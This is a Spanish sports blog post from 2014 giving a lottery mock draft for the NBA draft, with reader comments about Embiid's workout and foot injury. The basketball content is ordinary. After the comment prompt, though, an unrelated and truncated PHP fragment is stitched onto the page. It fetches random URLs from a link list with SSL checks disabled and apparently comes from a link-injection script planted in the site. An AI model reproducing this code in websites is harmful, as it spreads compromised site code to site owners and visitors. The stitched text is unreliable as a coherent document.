Mock Draft 4.0: Post-lotería

24 de May de 2014 por Jose_Dantley

Tras la lotería del pasado martes todos hemos aprendido a odiar un poco a los Cavs y a reírnos de sus errores. El morbo del posible error en un draft tan cargado de talento en su top-3 está presente tras el fiasco de Anthony Bennett. El resto de equipos simplemente bajaron una posición respecto a la prevista o se mantuvieron en la que tenían más papeletas. No obstante, la elección de Cleveland marcará el top-3 de igual manera que la elección de Orlando será la ficha de dominó que marque el resto de la lotería.

Pasamos a desgranar nuestra predicción de lotería, por primera vez teniendo en cuenta necesidades. Sin embargo, cuando el talento llama a tu puerta, la opción del BPA (mejor jugador disponible) suele ser la que llevan a cabo los mejores GM.

1. Cavaliers. Andrew Wiggins

Quizá el jugador que más puede encajar es Embiid dada la edad y el historial de lesiones de Varejao, pero Wiggins tiene un potencial descomunal y la duda, por pequeñísima que sea, sobre la espalda del pívot puede inclinar la balanza a favor del canadiense.

2. Bucks. Joel Embiid

La visión de un center capaz de ser determinante en defensa y en ataque es demasiado tentadora si la alternativa -Parker- presenta dudas sobre su ambición de ser superestrella. El agente de Embiid probablemente guardará información clave para según qué equipos. Por mercado, le convendría Philadelphia de entre las tres alternativas posibles. Para los Bucks, Embiid les da más flexibilidad para ir dando galones a la perla griega Antetokounmpo.

3. Sixers. Jabari Parker

San Hinkie, el GM de los Sixers es el que puede tener un mes más relajado, simplemente elegirá al que quede de entre el top-3. Parker es un buen elemento para un equipo que necesita anotación y que tendrá en Nerlens Noel el jugador defensivo que permita compensar las carencias de Parker. 

4. Magic. Marcus Smart

Orlando quería a Smart el año pasado. Exum es demasiado incierto como para arriesgarse si tenían en Smart como un valor seguro. Con ello, el experimento Oladipo de base puede llegar a su fin. Una pareja Smart-Oladipo puede ser muy interesante, especialmente si ambos mejoran su tiro exterior.

5. Jazz. Dante Exum

Muy difícil elección para Utah. Por un lado, con Favors y Kanter cabe poco juego interior. Con el criterio de mejor jugador disponible si descontamos el factor incertidumbre de Exum, los claros candidatos serían Vonleh y Randle. Exum, por otro lado, puede o no complementarse con Burke. Nos decantamos por Exum pero con muchas dudas.

6. Celtics. Noah Vonleh

A día de hoy vemos más factible que el pick vuele que Ainge decida elegir con el 6, pero si lo hiciera, Vonleh encajaría muy bien con el tipo de picks seleccionados últimamente por los Celtics: gente de equipo, con buena ética de trabajo y capacidad de aprendizaje. En ese sentido, Randle parece más hecho pero menos moldeable, de ahí que nos decantemos por Vonleh que además aporta un interesante tiro exterior.

7. Lakers. Julius Randle

Si llega Randle, no hay más opciones que elegirlo, aunque creemos que Saric tiene más potencial. Randle puede ser una buena pieza para construir pero no “la pieza” para construir. El hecho de que puede ser incompatible con Love, objeto de deseo Laker, puede ser un impedimiento.

8. Kings. Doug McDermott

Nuevamente un pick difícil. Por proyección debería ser Saric, sin embargo, no nos imaginamos al croata -y menos a su charlatán padre- contento con este destino, y así se lo harán saber si fuera necesario. Gordon es otra opción, pero no es el tipo de jugador que necesita Sacramento. Jugar a apostar por Lavine es otra posibilidad, incluso Ennis si no quieren tener que pagar demasiado a Thomas en su renovación. Así que en este desorden, quizá la opción más flexible es McDermott. Proporciona tiro exterior que siempre será de agradecer por parte de Cousins.

9. Bobcats. Nik Stauskas

El razonamiento que hicimos antes por Saric sigue siendo válido. Charlotte necesita tiradores y el mejor de los que queda es Stauskas. Al Jefferson y Michael Kidd-Gilchrist lo agradecerían.

10. Sixers. Dario Saric

Philadelphia es un mercado de renombre. Saric puede llegar a ser por calidad, un referente en los Sixers. Es demasiado bueno para dejarlo caer más.

11. Nuggets. Aaron Gordon

A partir de aquí cualquier sorpresa puede ocurrir. Denver tiene el equipo hecho. Aaron Gordon puede ser un Faried 2.0 pero quizá sea el jugador más seguro de los que quedan.

12. Magic. Zach Lavine

Orlando no tiene prisa. Siendo así, pueden ir a por el jugador con el techo más alto de los que quedan aunque también uno de los más verdes. Lavine es teóricamente escolta pero pudiera ser modelado con base. Atléticamente ya es uno de los jugadores más destacados del draft aunque su constitución física puede aún mejorar para potenciar su defensa.

13. Wolves. James Young

En su búsqueda de tiradores, los Wolves pueden apostar por Young que hizo más en los últimos dos partidos que en todo el campeonato. Mucho potencial, mucho riesgo.

14. Suns. Rodney Hood

Descartado cualquier base, Phoenix debería ir a por el mejor 3, 4 o 5 disponible. Otra opción es Nurkic si entienden que Len no es lo que esperaban.

Seguiremos atentos a posibles trades, aunque como siempre, será el mismo día del draft en el que se producirán más cambios.

En nuestro próximo mock nos atreveremos con toda la primera ronda.

Comenta

27 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Como Laker me fliparia que llegase Randle pero más abajo del 6 no lo veo de ninguna manera. También creo que con Henson-Sanders y el griego habiendo jugado bien de escolta los Bucks elegirán a Jabari Parker.

      Citar

  2. txusma dice:
    #2

    Viva_Dirk:
    Como Laker me fliparia que llegase Randle pero más abajo del 6 no lo veo de ninguna manera. También creo que con Henson-Sanders y el griego habiendo jugado bien de escolta los Bucks elegirán a Jabari Parker.

    Suponemos que Sanders simplemente se volvió loco al firmar la renovación y que volverá por sus fueros? El que parece que sube como la espuma es Noah Vonleh del que todo lo que se comenta es positivo aparte del hecho de q es el ala-pivot del trio Randle-Gordon-Vonleh que está más verde de los 3.

      Citar

  3. Dantley dice:
    #3

    Esto va rápido. Ayer en los workouts, Embiid despejó dudas sobre su espalda y dejó a todos con la boca abierta:

    https://www.youtube.com/watch?v=Qd3RVBZz6Rk

    No lo tengo tan claro ahora. Si Embiid está tan sano, diría que la decisión es 50%/50%
    Que llegue Randle al 7 se produciría solo si Orlando se va a por Smart. y/o Utah decide no liarla en su juego interior y reproducir la situación de cuando estaba Jefferson.

    Diría que ahora mismo el consenso es que el potencial de Vonleh es mayor que el de Randle. Eso y lo que hagan Orlando y Utah decidirá si llega al 7.

      Citar

  4. Denise dice:
    #4

    Lavine creo que está verdisimo y si fuese inteligente, se presentaría en el 2015, en el cual llegaría más preparado para la NBA, y ganaría más dinero porque saldría fijo en el Top 5.
    Si Orlando no pilla un base (Smart/Exum) en su primera elección, creo que en su segunda, el elegido sería Ennis.
    Y en el #4, si Park-Wig-Emb ni llegan disponibles, creo que se la van a jugar con Exum.

    Tal y como dije en el mock propio que hice eñ día posterior al Draft, si fuera el GM de los Suns, en el #14 me la jugaría con Capela. A esa altura del Draft, un jugador con semejante físico y potencial, puede ser un robazo.

    Admiro la confianza que depositas en Stauskas, yo lo que he visto de él no me mola, no lo veo digno ni del Top 20. Me parece más un jugador de rotación corta de 15 minutitos con un rol de microondas, veo un alto porcentaje de pick malgastado en él si fuese elegido en el Top 10.

      Citar

  5. Denise dice:
    #5

    Dantley:

    https://www.youtube.com/watch?v=Qd3RVBZz6Rk

    Viendo esto..machacar parece hasta facil. Es tan grande el jodido, que parece que el aro está a 2,60.

      Citar

  6. arivas dice:
    #6

    @WojYahooNBA: “Watching Joel Embiid in workout for league executives in Santa Monica. Impossible to imagine passing on him at No. 1.”

    La verdad que parce que ha impresionado Embiid. Esta claro que despeja dudas sobre su espalda etc es dificil dejar pasar un pivot con esas condiciones. Yo no tengo nada claro que opción es mejor para los Cavs, tambien lo veo 50-50. Si consiguen retener a Deng y confian en Waiters (ya no se pega mas con Irving) pues quiza sea mejor Embiid, pero claro si Deng se pira y estan cansados de Waiters, pues Wiggins puede ser la opción.
    Si tengo que apostar creo que iran a por Embiid. Aunque el riesgo de fallar de nuevo con el 1 puede estar ahí y la lesión de Embiid hace que sea el mas arriesgado.

      Citar

  7. Jose Luis dice:
    #7

    Denise: Viendo esto..machacar parece hasta facil. Es tan grande el jodido, que parece que el aro está a 2,60.

    Justo eso iba a decir, ¿la canasta está a la altura oficial? xD

      Citar

  8. underlock dice:
    #8

    No me considero conocedor del basket universitario ni mucho menos, pero se me hace muy difícil que Joel Embiid no sea Nº1. Bestia física, movimientos al poste interesantísimos, parece que no tiene un mal tiro de media distancia y se defiende bien en los tiros libres como se puede ver en el vídeo.

    Y además, sería una elección más lógica para Cavaliers, ya que si eligen a Wiggins tendría que compartir la bola por fuera con Irving y Waiters.

    Entiendo que es una decisión complicada, pero si yo fuera el GM de los Cavs lo tendría bastante claro, si como parece Joel Embiid está sin ningún tipo de problema físico yo no tendría dudas.

      Citar

  9. Denise dice:
    #9

    underlock:
    No me considero conocedor del basket universitario ni mucho menos, pero se me hace muy difícil que Joel Embiid no sea Nº1. Bestia física, movimientos al poste interesantísimos, parece que no tiene un mal tiro de media distancia y se defiende bien en los tiros libres como se puede ver en el vídeo.

    Y además, sería una elección más lógica para Cavaliers, ya que si eligen a Wiggins tendría que compartir la bola por fuera con Irving y Waiters.

    Entiendo que es una decisión complicada, pero si yo fuera el GM de los Cavs lo tendría bastante claro, si como parece Joel Embiid está sin ningún tipo de problema físico yo no tendría dudas.

    Yo también, y mas aún teniendo en cuenta que Cleveland va a poner toda la carne en el asador para que Lebron vuelva este verano, por lo que draftear a Wigg/Parker no tendría sentido.

      Citar

  10. Esteban dice:
    #10

    Denise: an aunque también uno de los más verdes. Lavine es teóricamente escolta pero pudiera ser modelado con base. Atléticamente ya es uno de los jugadores más destacados del draft aunque su constitución física puede aún mejorar para potenciar su defensa.

    no no puede ser cierto, cuanto mide este muchacho? tiene la agilidad y movimientos de un tipo de 1.98 centimetros, madre mia, a men que tengas lesiones, estamos enfrente de un jugador con un potencial mejor centro de la liga

    giro y contra giro, fintas y salto, espalda ancha y brazos formados (pienso en davis), que pena si su salus no lo acompaña

      Citar

  11. Esteban dice:
    #11

    mas allá de eso, no creo que haya mayores inventos y no debería, los Cavs tienen que elegir a jabari Parker necesariamente, y jugar con todas sus selección de titulares este año

    irving, waiters, parker, bennet y thompson (o zeller)

    y eso si, desde el minuto 1, confianza y muchisimos minutos tanto a bennet como a parker, de lo contrario, odiare a los cavs profundamente de por vida

      Citar

  12. Denise dice:
    #12

    Esteban, en el comentario #9, ó te has equivocado al citar ó estas manipulando los comentarios jaja, la cuestión es que yo no he dicho eso. Has citado lo dicho de Lavine por Dantley en mi nombre, y tú hablando de otra cosa distinta, de Embiid supongo….jojo

      Citar

  13. Denise dice:
    #13

    Esteban:
    mas allá de eso, no creo que haya mayores inventos y no debería, los Cavs tienen que elegir a jabari Parker necesariamente, y jugar con todas sus selección de titulares este año

    irving, waiters, parker, bennet y thompson (o zeller)

    y eso si, desde el minuto 1, confianza y muchisimos minutos tanto a bennet como a parker, de lo contrario, odiare a los cavs profundamente de por vida

    Y este no te gusta más…Irving, Waiters, Lebron, Bennet y Embiid
    Yo es que creo que Lebron algún dia volverá a casa, y como los Heat sean barridos por los Pacers…, creo que Lebron con la tranquilidad que le da el tener 2 anillos ya en sus dedos, quizás busque cerrar este ciclo y abrir un nuevo proyecto y que mejor lugar para él, que en el equipo de su estado, que ya tienen a un All-Star como Irving, poseen el pick 1 del Draft más ilusionante desde el suyo en 2003, y aun fichando a Lebron, los Cavs seguirian teniendo espacio para fichar a 2 jugadores de tipo medio por contrato de 4-5 kilos y completar la plantilla.

      Citar

  14. Esteban dice:
    #14

    Denise:
    Esteban, en el comentario #9, ó te has equivocado al citar ó estas manipulando los comentarios jaja, la cuestión es que yo no he dicho eso.Has citado lo dicho de Lavine por Dantley en mi nombre, y tú hablando de otra cosa distinta, de Embiid supongo….jojo

    es cierto, quize citar el video publicado por dantley

      Citar

  15. Ruxixon dice:
    #15

    LeBron ya ha dicho que en el mejor momento de su carrera no va a irse a un proyecto que no tiene garantías.Parece tentador irse a unos Cavaliers con Irving y Embiid,pero sinceramente,a mi Irving me deja muchas dudas de lo que puede llegar a beneficiar a su equipo.

      Citar

  16. Esteban dice:
    #16

    Ruxixon:
    LeBron ya ha dicho que en el mejor momento de su carrera no va a irse a un proyecto que no tiene garantías.Parece tentador irse a unos Cavaliers con Irving y Embiid,pero sinceramente,a mi Irving me deja muchas dudas de lo que puede llegar a beneficiar a su equipo.

    comparto, por mas all star q sea irving, su ultima temporada deja muchas dudas y yo que lebron ni loco lo elijo por sobre wade, por mas viejo que este

    los cavs tienen jugadores jovenes y talento, deberia olvidarse gilbert de querer ganar ya e ir de a poco estilo el thunder, desde ellos que no se ve tanto potencial joven en un mismo equipo, una pena si lo desaprovechan con locuras de PO q derivan en bynum, deng, varejao etc

      Citar

  17. Dantley dice:
    #17

    Denise:
    Lavine creo que está verdisimo y si fuese inteligente, se presentaría en el 2015, en el cual llegaría más preparado para la NBA, y ganaría más dinero porque saldría fijo en el Top 5.

    Y en el #4, si Park-Wig-Emb ni llegan disponibles, creo que se la van a jugar con Exum.

    Tal y como dije en el mock propio que hice eñ día posterior al Draft, si fuera el GM de los Suns, en el #14 me la jugaría con Capela. A esa altura del Draft, un jugador con semejante físico y potencial, puede ser un robazo.

    Admiro la confianza que depositas en Stauskas, yo lo que he visto de él no me mola, no lo veo digno ni del Top 20. Me parece más un jugador de rotación corta de 15 minutitos con un rol de microondas, veo un alto porcentaje de pick malgastado en él si fuese elegido en el Top 10.

    Coincido con tu apreciación sobre Lavine. 2015 sería su año ya con mando en plaza en UCLA. Se la está jugando a potencial.

    Capela es uno más de tantos. Te puede salir un Ibaka o te puede salir un Saer Sane, o algo intermedio tipo Biyombo. Antes que jugármela así, me voy a algo más contrastado como Nurkic o Payne.

    Lo de Stauskas es personal, pero ten en cuenta una cosa. Al final, cuando miras el draft hacia atrás 6 o 7 años, son pocos los que llegan, y de entre los que llegan varios son especialistas útiles. Imagina que se presenta Korver sabiendo lo que sabemos. Un jugador que airea el juego interior. O Redick, que quizá sea peor ejemplo porque era increíble en la NCAA. Un tirador es algo muy apreciado. Stauskas además es pasador. Es obvio que en defensa tiene problemas, pero también los tiene Redick, Korver o Anderson. Mira el partido de ayer con Ray Allen -que ya con esta edad cumple el papel que podría tener Stauskas. Eso es muy valioso y muy escaso.

    Draftexpress lo da 13, ESPN lo da 10. Al principio costaba pero es un valor seguro que te va a dar esos 15/25 minutos que te abran la defensa.

      Citar

  18. Arivas dice:
    #18

    http://m.youtube.com/watch?v=DSDl9JF5hvU

    El video de Jabari, que tb deja buenas sensaciones.

      Citar

  19. Denise dice:
    #19

    Arivas:
    http://m.youtube.com/watch?v=DSDl9JF5hvU

    El video de Jabari, que tb deja buenas sensaciones.

    Ya me pareció en el video de Embiid, y ahora con Parker lo noto más, esas canastan no están a la altura oficial (3,05).!!
    Ojalá encuentre el dato, pero apostaría dinero a que esos aros están a 2,85 como mucho.

      Citar

  20. Ruxixon dice:
    #20

    Rumores de Embiid con una lesión en el pie (Bill Simmons en Twitter ha soltado la liebre)

      Citar

  21. TheDeerHunter dice:
    #21

      Citar

  22. Pua dice:
    #22

    Que mala suerte, con la pinta alucinante que tiene el chaval

      Citar

  23. Denise dice:
    #23

    TheDeerHunter:
    Está confirmado.
    http://espn.go.com/nba/draft2014/story/_/id/11107087/joel-embiid-suffers-foot-injury-prior-nba-draft
    Rotura del pie.

    ¿Cuantos meses de baja es eso? ¿Que hueso en concreto es el roto?

      Citar

  24. Denise dice:
    #24

    Estaba repasando el orden del Draft, y bueno, como mucho bajaría hasta el pick 6, se me hace imposible pensar que Boston lo dejase pasar.
    Lo malo para mí es que esto hace que Exum peligre claramente para los Magic.

      Citar

  25. Jose Luis dice:
    #25

    Pues no sé… yo lo cogería igualmente si fuera los Sixers, total son el pick3…

    quizá cojan un AP y larguen pronto a Young, Vonleh o Randle supongo.

      Citar

  26. Dantley dice:
    #26

    Entre 4 y 6 meses.

    Daremos un mock actualizado pronto

      Citar

  27. Denise dice:
    #27

    También suena con fuerza que los 76ers quieren a Wiggins a toda costa y traspasarían su pick 3 + Young a Cavaliers a cambio del pick 1. Así Cleveland podría esocger a Embiid en el 3 con menor riesgo.
    BTW…. David Blatt ficha por los Cavs, gran coach si señor.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>